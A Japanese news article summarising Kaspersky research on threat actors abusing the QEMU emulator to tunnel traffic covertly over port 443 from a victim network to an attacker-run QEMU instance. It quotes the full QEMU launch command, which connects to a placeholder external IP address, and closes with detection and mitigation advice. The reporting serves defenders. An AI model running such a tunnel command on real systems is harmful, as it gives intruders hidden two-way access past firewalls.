Kaspersky Labはこのほど、「Network tunneling with… QEMU?|Securelist」において、プロセッサーエミュレーター「QEMU」をサイバー攻撃に悪用する事例とその危険性を伝えた。QEMUはプロセッサおよび周辺機器をエミュレートする機能を持ち、既存のさまざまなオペレーティングシステムやアプリケーションを仮想環境で動作させることができる。
QEMUを悪用する手口
リモートからサイバー攻撃を実行する場合、セキュリティソリューションから攻撃を隠蔽するためにさまざまな秘匿化が行われる。その隠蔽戦術には信頼された既存のツールを使用する方法や、通信を暗号化する方法などがある。QEMUは広く活用されている悪意のないソフトウェアのため、その悪用は前者に該当する。
QEMUはホスト環境へ影響が出ないようにサンドボックスとして設計されているため、悪用は難しい。そのため、QEMUをツールとして悪用する例は確認されていなかったが、今回Kaspersky Labはとある事案において脅威アクターがQEMUを実行していることを確認したという。
分析の結果、QEMUを通信のトンネリングに悪用していることが判明したとして、その詳細が公開された。QEMUをトンネリングに使用すると、悪意のないソフトウェアによる通信トンネルを作成できるため、セキュリティソリューションによる検出を回避できるとみられている。
QEMUのトンネリング機能
Kaspersky Labがこの事案で確認したQEMUの起動コマンドは次のとおり。
- qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev socket,id=sock,connect=IP_ADDRESS:443 -netdev hubport,id=port-lan,hubid=0,netdev=lan -netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic
このコマンドで指定している「IP_ADDRESS」は外部のIPアドレスで、そこでは脅威アクターが管理している別のQEMUが動作していると推測される。QEMUはこのように2つの仮想環境間を接続する機能を持っており、標準で通信トンネルを構成できる。なお、このコマンドを使用するとシステムにほとんど負荷はかからないという。
このコマンドではポート443を使用しており、外部からはHTTPS通信をしているように見える。脅威アクターは標的のネットワーク内部から外部のポート443へ接続しているため、ファイアウォールなどは問題なく突破可能。そして、このトンネルを使用することで、脅威アクターは自身のサーバー上で動作しているQEMUの仮想環境から標的のネットワーク内部への双方向の通信を実現できる。
対策
QEMUはトンネリング通信を暗号化しない。そのため、QEMUによってカプセル化されたデータは容易に復元できる。すでにKasperskyのセキュリティソリューションはQEMUの不審なアクティビティを検出できるとしている。
脅威アクターはさまざまな正規の無害なアプリケーションを徹底的に調査しており、セキュリティソリューションの検出を回避できるのであればすべてのアプリケーションを悪用する可能性がある。そのため、企業や組織にはあらゆる未知の攻撃に備えることが求められており、高度なエンドポイント保護やネットワーク監視機能を実現するセキュリティソリューションの導入が望まれている。